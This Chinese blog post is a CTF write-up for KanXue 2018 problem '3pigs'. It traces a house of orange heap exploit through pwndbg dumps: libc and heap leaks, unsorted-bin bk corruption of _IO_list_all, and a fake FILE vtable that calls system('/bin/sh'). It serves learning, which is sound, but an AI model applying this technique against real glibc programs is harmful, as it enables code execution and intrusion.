看雪2018CTF第11题PWN-3pigs之qwertyaa的

2019-05-10  本文已影响0人  静析机言

1. 概述

看雪2018CTF第11题的网址如下,感兴趣的朋友们可以下载试手。

https://ctf.pediy.com/game-fight-65.htm

此题保护全开

初始会分配内存(chunk_size=0xE20+0x10),专门画了一个猪头

功能分析:

——sub_1897:new pig。最多可创建3个:0,1,2。chunk_size=0xD0

漏洞:可以多写0x10个字节,可以修改下一个chunk的头部。

——sub_19FF:free功能正常。

——sub_1AA1:print pig。只能print一次,且只有new过的才能print

——sub_1B94:new fly pig。chunk_size=0x80,大小无法用来做fastbin attack修改__malloc_hook

——sub_1C52:edit fly pig。漏洞:修改addr+0x80的内容,可以修改下一个chunk的fd和bk。

本题利用的局限性很大,刚开始根本不知道怎么利用,看了各位大佬的wp才知道了house of orange。下面以qwertyaa提供的wp为例,展现调试过程及自己的理解,方便你我这样的小白共同成长。

https://bbs.pediy.com/thread-229647.htm

1).   secret()

pwndbg> x/10gx 0x000055986c0afe40-0x10

0x55986c0afe30:     0x0000000000000000     0x0000000000000081

0x55986c0afe40:     0x0000000000000000     0x0000000000000000

0x55986c0afe50:     0x0000000000000000     0x0000000000000000

0x55986c0afe60:     0x0000000000000000     0x0000000000000000

0x55986c0afe70:     0x0000000000000000     0x0000000000000000

2). create(2,'hello')

pwndbg> x/26gx 0x000055986c0afec0-0x10

0x55986c0afeb0:     0x0000000000000000     0x00000000000000d1

0x55986c0afec0:     0x694c206c6c616d53      0x0000000000000000

0x55986c0afed0:     0x0000006f6c6c6568       0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000000

0x55986c0aff40:      0x0000000000000000     0x0000000000000000

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000

3). secret()

pwndbg> x/10gx 0x000055986c0aff90-0x10

0x55986c0aff80:      0x0000000000000000     0x0000000000000081

0x55986c0aff90:      0x0000000000000000     0x0000000000000000

0x55986c0affa0:      0x0000000000000000     0x0000000000000000

0x55986c0affb0:      0x0000000000000000     0x0000000000000000

0x55986c0affc0:      0x0000000000000000     0x0000000000000000

4). create(1,'hi')

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x00796f4220646552      0x0000000000000000

0x55986c0b0020:    0x0000000000006968     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

5). create(0,"hi")

pwndbg> x/26gx 0x000055986c0b00e0-0x10

0x55986c0b00d0:    0x0000000000000000     0x00000000000000d1

0x55986c0b00e0:    0x000061754720654b     0x0000000000000000

0x55986c0b00f0:     0x0000000000006968     0x0000000000000000

0x55986c0b0100:    0x0000000000000000     0x0000000000000000

0x55986c0b0110:    0x0000000000000000     0x0000000000000000

0x55986c0b0120:    0x0000000000000000     0x0000000000000000

0x55986c0b0130:    0x0000000000000000     0x0000000000000000

0x55986c0b0140:    0x0000000000000000     0x0000000000000000

0x55986c0b0150:    0x0000000000000000     0x0000000000000000

0x55986c0b0160:    0x0000000000000000     0x0000000000000000

0x55986c0b0170:    0x0000000000000000     0x0000000000000000

0x55986c0b0180:    0x0000000000000000     0x0000000000000000

0x55986c0b0190:    0x0000000000000000     0x0000000000000000

6). delete(1)

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x00007f0ca8a80b78      0x00007f0ca8a80b78

0x55986c0b0020:    0x0000000000006968     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

 

由于不与top chunk相连,且size=0xD0,所以待释放空间放入unsorted bin中。

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0b0000 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0b0000

smallbins

empty

largebins

empty

7). delete(2)

pwndbg> x/26gx 0x000055986c0afec0-0x10

0x55986c0afeb0:     0x0000000000000000     0x00000000000000d1

0x55986c0afec0:     0x000055986c0b0000     0x00007f0ca8a80b78

0x55986c0afed0:     0x0000006f6c6c6568       0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000000

0x55986c0aff40:      0x0000000000000000     0x0000000000000000

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000

同理,放入unsorted bin中。

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0afeb0 —▸ 0x55986c0b0000 —▸0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0afeb0

smallbins

empty

largebins

empty

8).  create(2,"\x00")

unsortedbin遵循先进先出的原则进行分配。

疑问:为什么此时bk位置会有heap上的地址0x000055986c0afeb0?

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x694c206c6c616d53      0x000055986c0afeb0

0x55986c0b0020:    0x0000000000000000     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0afeb0 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0afeb0

smallbins

empty

largebins

empty

9). delete(0)

待释放空间与top chunk合并

0x55986c0b00d0:    0x00000000000000d0     0x000000000001ff31

0x55986c0b00e0:    0x000061754720654b     0x0000000000000000

0x55986c0b00f0:     0x0000000000006968     0x0000000000000000

0x55986c0b0100:    0x0000000000000000     0x0000000000000000

0x55986c0b0110:    0x0000000000000000     0x0000000000000000

0x55986c0b0120:    0x0000000000000000     0x0000000000000000

0x55986c0b0130:    0x0000000000000000     0x0000000000000000

0x55986c0b0140:    0x0000000000000000     0x0000000000000000

0x55986c0b0150:    0x0000000000000000     0x0000000000000000

0x55986c0b0160:    0x0000000000000000     0x0000000000000000

0x55986c0b0170:    0x0000000000000000     0x0000000000000000

0x55986c0b0180:    0x0000000000000000     0x0000000000000000

0x55986c0b0190:    0x0000000000000000     0x0000000000000000

10). delete(2)

待释放空间与top chunk合并

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x0000000000020001

0x55986c0b0010:    0x694c206c6c616d53      0x000055986c0afeb0

0x55986c0b0020:    0x0000000000000000     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

11). create(2,"endFlag")

分配unsortedbin中的堆

pwndbg> x/26gx 0x000055986c0afec0-0x10

0x55986c0afeb0:     0x0000000000000000     0x00000000000000d1

0x55986c0afec0:     0x694c206c6c616d53      0x00007f0ca8a80b78

0x55986c0afed0:     0x0067616c46646e65     0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000000

0x55986c0aff40:      0x0000000000000000     0x0000000000000000

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000

pwndbg> hex 0x000055986c0afec0 0x100

+0000 0x55986c0afec0  53 6d 61 6c 6c 20 4c 69  78 0b a8 a8  0c 7f 00 00 │Smal│l.Li│x...│....│

+0010 0x55986c0afed0  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0020 0x55986c0afee0  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

+00c0 0x55986c0aff80  d0 00 00 00 00 00 00 00  81 00 00 00 00 00 00 00 │....│....│....│....│

+00d0 0x55986c0aff90  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

12). create(1,"endFlag")

pwndbg> x/26gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x00000000000000d1

0x55986c0b0010:    0x69796f4220646552      0x000055986c0afeb0

0x55986c0b0020:    0x0067616c46646e65     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

pwndbg> hex 0x000055986c0b0010 0x100

+0000 0x55986c0b0010  52 65 64 20 42 6f 79 69  b0 fe 0a 6c  98 55 00 00 │Red.│Boyi│...l│.U..│

+0010 0x55986c0b0020  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0020 0x55986c0b0030  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

+00c0 0x55986c0b00d0  d0 00 00 00 00 00 00 00  31 ff 01 00  00 00 00 00 │....│....│1...│....│

+00d0 0x55986c0b00e0  4b 65 20 47 75 61 00 00  00 00 00 00  00 00 00 00 │Ke.G│ua..│....│....│

+00e0 0x55986c0b00f0  68 69 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │hi..│....│....│....│

+00f0 0x55986c0b0100  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

ct=show()

pig0还没分配

pig1的数据??不清楚堆地址怎么生成的?

pwndbg> hex 0x000055986c0b0010 0x100

+0000 0x55986c0b0010  52 65 64 20 42 6f 79 69  b0 fe 0a 6c  98 55 0000  │Red.│Boyi│...l│.U..│

+0010 0x55986c0b0020  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0020 0x55986c0b0030  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

...

pig2的数据

pwndbg> hex 0x000055986c0afec0-0x100x100

+0000 0x55986c0afeb0  00 00 00 00 00 00 00 00  d1 00 00 00  00 00 00 00 │....│....│....│....│

+0010 0x55986c0afec0  53 6d 61 6c 6c 20 4c 69  78 0b a8 a8  0c 7f 0000  │Smal│l.Li│x...│....│

+0020 0x55986c0afed0  65 6e 64 46 6c 61 67 00  00 00 00 00  00 00 00 00 │endF│lag.│....│....│

+0030 0x55986c0afee0  00 00 00 00 00 00 00 00  00 00 00 00  00 00 00 00 │....│....│....│....│

求出libc_base和heap base

由main_arena+88=0x7f0ca8a80b78  --> libc_base = 0x7f0ca86bc000

由0x55986c0afeb0 – 0xeb0 =heap_base = 0x55986c0af000   ???

(作者的解释:具体值本地cat maps后得出,因为肯定是固定的)

进而算出system、_IO_list_all的地址

sysp=libc_base+dlc.symbols['system']

ilap=libc_base+dlc.symbols['_IO_list_all']   #IO_list_all

13). delete(2)

放入unsortedbin中

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0afeb0 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0afeb0

smallbins

empty

largebins

empty

14). delete(1)

待释放空间放入top chunk中

pwndbg> x/30gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x0000000000020001

0x55986c0b0010:    0x69796f4220646552      0x000055986c0afeb0

0x55986c0b0020:    0x0067616c46646e65     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

0x55986c0b0080:    0x0000000000000000     0x0000000000000000

0x55986c0b0090:    0x0000000000000000     0x0000000000000000

0x55986c0b00a0:    0x0000000000000000     0x0000000000000000

0x55986c0b00b0:    0x0000000000000000     0x0000000000000000

0x55986c0b00c0:    0x0000000000000000     0x0000000000000000

0x55986c0b00d0:    0x00000000000000d0     0x000000000001ff31

0x55986c0b00e0:    0x000061754720654b     0x0000000000000000

15) multiSecret(2)

(1)第1次secret

从unsorted bin里分配堆,将剩余的堆空间放入unsortedbin中

pwndbg> x/26gx  0x55986c0afeb0

0x55986c0afeb0:     0x0000000000000000     0x0000000000000081

0x55986c0afec0:     0x00007f0ca8a80c38       0x00007f0ca8a80c38

0x55986c0afed0:     0x0067616c46646e65     0x0000000000000000

0x55986c0afee0:     0x0000000000000000     0x0000000000000000

0x55986c0afef0:      0x0000000000000000     0x0000000000000000

0x55986c0aff00:      0x0000000000000000     0x0000000000000000

0x55986c0aff10:      0x0000000000000000     0x0000000000000000

0x55986c0aff20:      0x0000000000000000     0x0000000000000000

0x55986c0aff30:      0x0000000000000000     0x0000000000000051

0x55986c0aff40:      0x00007f0ca8a80b78      0x00007f0ca8a80b78

0x55986c0aff50:      0x0000000000000000     0x0000000000000000

0x55986c0aff60:      0x0000000000000000     0x0000000000000000

0x55986c0aff70:      0x0000000000000000     0x0000000000000000

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x55986c0aff30 —▸ 0x7f0ca8a80b78 (main_arena+88) ◂—0x55986c0aff30

smallbins

empty

largebins

empty

(2)第2次secret

unsortedbin的堆块大小不够分,仍然在unsortedbin中

pwndbg> x/16gx 0x000055986c0b0010-0x10

0x55986c0b0000:    0x0000000000000000     0x0000000000000081

0x55986c0b0010:    0x69796f4220646552      0x000055986c0afeb0

0x55986c0b0020:    0x0067616c46646e65     0x0000000000000000

0x55986c0b0030:    0x0000000000000000     0x0000000000000000

0x55986c0b0040:    0x0000000000000000     0x0000000000000000

0x55986c0b0050:    0x0000000000000000     0x0000000000000000

0x55986c0b0060:    0x0000000000000000     0x0000000000000000

0x55986c0b0070:    0x0000000000000000     0x0000000000000000

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

0x50: 0x55986c0aff30 —▸ 0x7f0ca8a80bb8 (main_arena+152) ◂—0x55986c0aff30

largebins

empty

#Attack

上述的操作,用来确保接下来申请的内存都在top_chunk中进行。

:由于调试不是一次完成的,因此记录的地址可能前后不一致,但不影响阅读。后3个字节的地址还是保持不变的。

16) create(0,'0'*(0x80-0x10-0x10)+"/bin/sh\x00"+p64(0)*3+p64(2)+p64(3))#pre0x58

pwndbg> x/26gx 0x00005575b6e33090-0x10

0x5575b6e33080:    0x0000000000000000     0x00000000000000d1

0x5575b6e33090:    0x000061754720654b     0x0000000000000000

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

0x5575b6e330d0:    0x3030303030303030     0x3030303030303030

0x5575b6e330e0:    0x3030303030303030     0x3030303030303030

0x5575b6e330f0:     0x3030303030303030     0x3030303030303030

0x5575b6e33100:    0x0068732f6e69622f       0x0000000000000000    #/bin/sh

0x5575b6e33110:    0x0000000000000000     0x0000000000000000

0x5575b6e33120:    0x0000000000000002     0x0000000000000003

0x5575b6e33130:    0x0000000000000000     0x0000000000000000

0x5575b6e33140:    0x0000000000000000     0x0000000000000000

17) create(1,p64(0)*1+p64(sysp)+"\x00"*0x40+p64(0)*3+p64(he+0x1080+0x80+12*8))#st+0x60

pwndbg> x/26gx 0x00005575b6e33160-0x10

0x5575b6e33150:    0x0000000000000000     0x00000000000000d1

0x5575b6e33160:    0x00796f4220646552      0x0000000000000000

0x5575b6e33170:    0x0000000000000000     0x00007fd1a3e08390   #system

0x5575b6e33180:    0x0000000000000000     0x0000000000000000

0x5575b6e33190:    0x0000000000000000     0x0000000000000000

0x5575b6e331a0:    0x0000000000000000     0x0000000000000000

0x5575b6e331b0:    0x0000000000000000     0x0000000000000000

0x5575b6e331c0:    0x0000000000000000     0x0000000000000000

0x5575b6e331d0:    0x0000000000000000     0x00005575b6e33160   #实验了,此处可为任意值。不清楚在设置设为堆的地址干什么?

0x5575b6e331e0:    0x0000000000000000     0x0000000000000000

0x5575b6e331f0:     0x0000000000000000     0x0000000000000000

0x5575b6e33200:    0x0000000000000000     0x0000000000000000

0x5575b6e33210:    0x0000000000000000     0x0000000000000000

18) create(2,"hi")

pwndbg> x/26gx 0x00005575b6e33230-0x10

0x5575b6e33220:    0x0000000000000000     0x00000000000000d1

0x5575b6e33230:    0x694c206c6c616d53      0x0000000000000000

0x5575b6e33240:    0x0000000000006968     0x0000000000000000

0x5575b6e33250:    0x0000000000000000     0x0000000000000000

0x5575b6e33260:    0x0000000000000000     0x0000000000000000

0x5575b6e33270:    0x0000000000000000     0x0000000000000000

0x5575b6e33280:    0x0000000000000000     0x0000000000000000

0x5575b6e33290:    0x0000000000000000     0x0000000000000000

0x5575b6e332a0:    0x0000000000000000     0x0000000000000000

0x5575b6e332b0:    0x0000000000000000     0x0000000000000000

0x5575b6e332c0:    0x0000000000000000     0x0000000000000000

0x5575b6e332d0:    0x0000000000000000     0x0000000000000000

0x5575b6e332e0:    0x0000000000000000     0x0000000000000000

19) secret()

pwndbg> x/16gx 0x00005575b6e33300-0x10

0x5575b6e332f0:     0x0000000000000000     0x0000000000000081

0x5575b6e33300:    0x0000000000000000     0x0000000000000000

0x5575b6e33310:    0x0000000000000000     0x0000000000000000

0x5575b6e33320:    0x0000000000000000     0x0000000000000000

0x5575b6e33330:    0x0000000000000000     0x0000000000000000

0x5575b6e33340:    0x0000000000000000     0x0000000000000000

0x5575b6e33350:    0x0000000000000000     0x0000000000000000

0x5575b6e33360:    0x0000000000000000     0x0000000000000000

20) delete(2)

待释放的堆块放入unsortedbin中,原来放入unsortedbin中的重新整理后放入smallbins[0x50]

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x5575b6e33220 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33220

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty

21) delete(1)

待释放的块与原unsortedbin中的块相连,合并后重新放入unsortedbin中

wndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x5575b6e33150 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33150

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty

# size=0xD0+0xD0=0x1A0

pwndbg> x/10gx 0x5575b6e33150

0x5575b6e33150:    0x0000000000000000     0x00000000000001a1

0x5575b6e33160:    0x00007fd1a4187b78      0x00007fd1a4187b78

0x5575b6e33170:    0x0000000000000000     0x00007fd1a3e08390

0x5575b6e33180:    0x0000000000000000     0x0000000000000000

0x5575b6e33190:    0x0000000000000000     0x0000000000000000

22) delete(0)

待释放的块与原unsortedbin中的块相连,合并后重新放入unsortedbin中

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x5575b6e33080 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33080

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty

# size=0x1A0+0xD0=0x270

pwndbg> x/10gx 0x5575b6e33080

0x5575b6e33080:    0x0000000000000000     0x0000000000000271

0x5575b6e33090:    0x00007fd1a4187b78      0x00007fd1a4187b78

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

23) secret()

pwndbg> x/20gx 0x00005575b6e33090-0x10

0x5575b6e33080:    0x0000000000000000     0x0000000000000081

0x5575b6e33090:    0x00007fd1a4187dd8      0x00007fd1a4187dd8

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

0x5575b6e330d0:    0x3030303030303030     0x3030303030303030

0x5575b6e330e0:    0x3030303030303030     0x3030303030303030

0x5575b6e330f0:     0x3030303030303030     0x3030303030303030

0x5575b6e33100:    0x0068732f6e69622f       0x00000000000001f1

0x5575b6e33110:    0x00007fd1a4187b78      0x00007fd1a4187b78

原来unsortedbin中0x5575b6e33080切掉0x80分给secret后,剩余的0x5575b6e33100放入unsortedbin中

unsortedbin

all: 0x5575b6e33100 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33100

16-23步对应的内存布局如下

24) editSecret(p64(lc+0x3C4B78)+p64(ilap-0x10)[:7])

修改下一个chunk的bk指针,为了house of orange利用时将_IO_list_all指向main_arena+88=0x00007fd1a4187b78

pwndbg> x/20gx 0x00005575b6e33090-0x10

0x5575b6e33080:    0x0000000000000000     0x0000000000000081

0x5575b6e33090:    0x00007fd1a4187dd8      0x00007fd1a4187dd8

0x5575b6e330a0:    0x3030303030303030     0x3030303030303030

0x5575b6e330b0:    0x3030303030303030     0x3030303030303030

0x5575b6e330c0:    0x3030303030303030     0x3030303030303030

0x5575b6e330d0:    0x3030303030303030     0x3030303030303030

0x5575b6e330e0:    0x3030303030303030     0x3030303030303030

0x5575b6e330f0:     0x3030303030303030     0x3030303030303030

0x5575b6e33100:    0x0068732f6e69622f       0x00000000000001f1

0x5575b6e33110:    0x00007fd1a4187b78      0x00007fd1a4188510

unsortedbin

all [corrupted]

FD: 0x5575b6e33100 —▸ 0x7fd1a4187b78 (main_arena+88) ◂—0x5575b6e33100

BK: 0x5575b6e33100 —▸ 0x7fd1a4188510 ◂—0x0

smallbins

0x50: 0x5575b6e32f30 —▸ 0x7fd1a4187bb8 (main_arena+152) ◂—0x5575b6e32f30

largebins

empty

25) secret()

触发一个申请chunk_size=0x80的空间操作,实施house of orange的后半段攻击。跟踪malloc.c中的_int_malloc

1)修改_IO_list_all指向

unsorted_chunks (av)->bk = bck;

bck->fd = unsorted_chunks (av);

pwndbg> x/gx &_IO_list_all

0x7f32cbfba520 <_IO_list_all>:       0x00007f32cbfb9b78

2)将0x55bf8e8ba100放入smallbins[0x1f0],此时*((main_arena+88)+0x1f0)= 0x55bf8e8ba100

mark_bin (av, victim_index);

victim->bk = bck;

victim->fd = fwd;

fwd->bk = victim;

bck->fd = victim;

pwndbg> bin

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all [corrupted]

FD: 0x55bf8e8ba100 —▸ 0x7f32cbfb9d58 (main_arena+568) ◂—0x55bf8e8ba100

BK: 0x7f32cbfba510 ◂—0x0

smallbins

0x50: 0x55bf8e8b9f30 —▸ 0x7f32cbfb9bb8 (main_arena+152) ◂—0x55bf8e8b9f30

0x1f0: 0x55bf8e8ba100 —▸ 0x7f32cbfb9d58 (main_arena+568) ◂—0x55bf8e8ba100

largebins

empty

从_IO_flush_all_lockp的代码可以看出,首先fp = (_IO_FILE *) _IO_list_all,然后通过

fp =fp->_chain不断地寻找下一个_IO_FILE,

只要fp满足

fp->_mode <= 0 && fp->_IO_write_ptr >fp->_IO_write_base

就能执行到_IO_OVERFLOW,从而转入设定的system(‘/bin/sh’)

本文的利用相比于https://github.com/shellphish/how2heap/blob/master/glibc_2.25/house_of_orange.c而言稍稍变换了一下形式。

github代码是直接将unsorted bin中的堆块头部的size改成了0x61,让执行_int_malloc时将unsortedbin的堆块放入smallbins[0x60]中,从而控制fp->chain的走向。而本题并没修改unsortedbin中堆块的size,因此_int_malloc在整理unsortedbin的块时,将其挪到了smallbins[0x1F0]。但利用本质并没有变化,只是让fp多了几次fp->chain的搜索而已,最终fp->chain会等于0x55bf8e8ba100(即为我们控制的unsortedbin)。

下面直接截图来说明

p (*(struct _IO_FILE *) 0x7f32cbfb9b78)

ok,现在fp->chain=0x55bf8e8ba100,查看下它将vtable改成啥了。

p (*(struct _IO_FILE_plus *) 0x55bf8e8ba100)

其中fp->mode=0, fp->_IO_write_ptr=3, fp->_IO_write_base=2,满足执行_IO_OVERFLOW的前置条件。

vtable指向0x55bf8e8ba160。

p (*(struct _IO_jump_t *) 0x55bf8e8ba160)

__overflow指向了libc_system。

fp=0x55bf8e8ba100的头部指向/bin/sh。因此,_IO_OVERFLOW(fp, EOF)相当于执行system(‘/bin/sh’)

2. 总结

发现qwertyaa与其他大佬的解法不同:没有利用house of orange中的前半段关于top_chunk不够分调用sysmalloc产生一个unsortedbin,仅使用了后半段修改一个unsortedbin和最后申请一个空间的操作。用程序本身的功能直接free出unsorted bin。

跟踪调试后,还是存在一个疑问:不知道基于什么原理才会泄露一个堆地址?且发现exp中的

create(1,p64(0)*1+p64(sysp)+"\x00"*0x40+p64(0)*3+p64(he+0x1080+0x80+12*8))

中给出的这个堆地址没有啥具体作用,house of orange用不到该堆地址。

后来我自己将exp脚本中的这句改成:

create(1,p64(0)*1+p64(sysp)+"\x00"*0x40+p64(0)*4)

也可完美利用。因而引出结论:没必要泄露堆地址,根本用不着。

记录在此,说不定哪天自己就都搞清楚了呢:-)

上一篇 下一篇

猜你喜欢

热点阅读